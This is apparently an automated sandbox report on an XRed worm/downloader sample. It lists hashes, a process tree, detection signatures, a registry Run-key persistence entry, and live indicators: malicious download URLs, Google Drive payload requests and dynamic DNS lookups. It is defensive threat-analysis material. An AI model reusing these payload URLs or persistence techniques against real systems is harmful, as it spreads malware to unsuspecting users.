Edit tour

Windows Analysis Report
LisectAVT_2403002A_282.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_282.exe
Analysis ID:	1482372
MD5:	6d1fd0af6dd71b3ca81ecefb1d9f9324
SHA1:	7dce009fae200ad379a332bc4f2cc5dc8c88df52
SHA256:	43c1d24d64d652dba7a789b4eb06870d5ba199060f0069b906a7b0f9ecbd4d70
Tags:	exe
Infos:

Detection

XRed

Score:	54
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Yara detected XRed

AI detected suspicious sample

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Drops PE files to the document folder of the user

Machine Learning detection for dropped file

Machine Learning detection for sample

Uses dynamic DNS services

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

LisectAVT_2403002A_282.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_282.exe" MD5: 6D1FD0AF6DD71B3CA81ECEFB1D9F9324)

._cache_LisectAVT_2403002A_282.exe (PID: 6884 cmdline: "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe" MD5: 1BD671CE0DEAAA901841AE87D92B3606)

._cache_LisectAVT_2403002A_282.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe" -burn.unelevated BurnPipe.{D1F32E49-3F7D-4852-BF07-482476425E70} {3ABCDB34-CFB2-4087-949E-3896BDF3C63B} 6884 MD5: 1BD671CE0DEAAA901841AE87D92B3606)

Synaptics.exe (PID: 7108 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B753207B14C635F29B2ABF64F603570A)

EXCEL.EXE (PID: 4924 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 7984 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

Synaptics.exe (PID: 7248 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B753207B14C635F29B2ABF64F603570A)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
LisectAVT_2403002A_282.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
LisectAVT_2403002A_282.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\RCX822C.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCX822C.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: LisectAVT_2403002A_282.exe PID: 6740	JoeSecurity_XRed	Yara detected XRed	Joe Security

Sigma Signatures

System Summary

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 4924, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49760

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49760, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 4924, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe, ProcessId: 6740, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7108, TargetFilename: C:\Users\user\AppData\Local\Temp\4bzU9tWE.xlsm

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE W32.Bloat-A Checkin - Source IP: 192.168.2.4 - Destination IP: 69.42.215.252

Timestamp:	2024-07-25T22:05:07.404967+0200
SID:	2832617
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T22:05:12.802691+0200
SID:	2022930
Source Port:	443
Destination Port:	49747
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/SnakeKeyLogger Payload Request (GET) - Source IP: 192.168.2.4 - Destination IP: 142.250.184.238

Timestamp:	2024-07-25T22:06:06.778111+0200
SID:	2044887
Source Port:	49756
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T22:05:50.628500+0200
SID:	2022930
Source Port:	443
Destination Port:	49755
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LisectAVT_2403002A_282.exe	Avira: detected
Source: LisectAVT_2403002A_282.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SSLLibrary.dll

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\Synaptics\RCX822C.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX822C.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: WORM/Delphi.Gen
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 91.9% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Synaptics\RCX822C.tmp	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LisectAVT_2403002A_282.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CA8281 _memset,CryptCATAdminCalcHashFromFileHandle,GetLastError,GetLastError,CryptCATAdminCalcHashFromFileHandle,GetLastError,WinVerifyTrust,WinVerifyTrust,WinVerifyTrust,	1_2_00CA8281
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CC7C27 _memset,CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,ReadFile,CryptHashData,ReadFile,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,GetLastError,CryptDestroyHash,CryptReleaseContext,	1_2_00CC7C27
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CA8558 CryptHashPublicKeyInfo,GetLastError,	1_2_00CA8558
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CA86D9 DecryptFileW,	1_2_00CA86D9

Source: LisectAVT_2403002A_282.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1028\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1029\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1031\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1036\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1040\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1041\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1042\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1045\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1046\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1049\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1055\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\2052\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\3082\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\license.rtf	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49763 version: TLS 1.2

Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\WixStdBA.pdbH source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmp, wixstdba.dll.2.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb source: LisectAVT_2403002A_282.exe, ._cache_LisectAVT_2403002A_282.exe.0.dr, Synaptics.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb`E source: LisectAVT_2403002A_282.exe, ._cache_LisectAVT_2403002A_282.exe.0.dr, Synaptics.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\WixStdBA.pdb source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmp, wixstdba.dll.2.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb` source: ._cache_LisectAVT_2403002A_282.exe, 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000001.00000000.1729235630.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3581941102.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000002.00000000.1731390957.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp

Source: LisectAVT_2403002A_282.exe, 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: LisectAVT_2403002A_282.exe, 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: LisectAVT_2403002A_282.exe, 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf
Source: LisectAVT_2403002A_282.exe	Binary or memory string: [autorun]
Source: LisectAVT_2403002A_282.exe	Binary or memory string: [autorun]
Source: LisectAVT_2403002A_282.exe	Binary or memory string: autorun.inf
Source: RCX822C.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX822C.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX822C.tmp.0.dr	Binary or memory string: autorun.inf
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CC5D81 _memset,FindFirstFileW,FindClose,	1_2_00CC5D81
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CC6D15 _memset,_memset,GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,	1_2_00CC6D15
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CA8E6E _memset,FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	1_2_00CA8E6E
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 2_2_6C9CA815 _memset,FindFirstFileW,FindClose,	2_2_6C9CA815

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View	IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View

ASN Name: AWKNET-LLCUS AWKNET-LLCUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CB6FC7 InternetReadFile,WriteFile,WriteFile,GetLastError,GetLastError,

1_2_00CB6FC7

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
Source: global traffic	HTTP traffic detected: GET /rules/rule170012v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule63067v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 25 Jul 2024 20:06:07 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-Q-KpEl70Z8ceTtUe_U-h3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1642X-GUploader-UploadID: AHxI1nOVQ6Ad7kc-N3ZS3DvZggDNSPXEh-0FYI4q8zVfxEDRBHZ7r-2vrpIdCLkQ3EWGn2IGXTURPcZtkwServer: UploadServerSet-Cookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY; expires=Fri, 24-Jan-2025 20:06:07 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 25 Jul 2024 20:06:09 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-996CPecssUltDuB5_iNHfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1642X-GUploader-UploadID: AHxI1nO_fflvwe6c8W4XxWG1P4JvlatE11JCTgJYmc0QZrZS8WfGePwmCoVcmeOkHdEHw2YaE6Sxug__0QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 25 Jul 2024 20:06:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ChF911g6bM79_cyaQqi5Aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1642X-GUploader-UploadID: AHxI1nOczPStk0J1wmLYKrSbep6FpNrxeIvTxJ1tqKBPFczn9Iov_rn_oTD4_Ca5ws79mWAbG7QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: Synaptics.exe.0.dr	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978X
Source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584436844.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584210775.0000000003270000.00000004.00000020.00020000.00000000.sdmp, thm.xml.2.dr	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010
Source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584436844.00000000035B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010(
Source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584436844.00000000035B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wixtoolset.org/schemas/thmutil/2010Hd;la
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl$
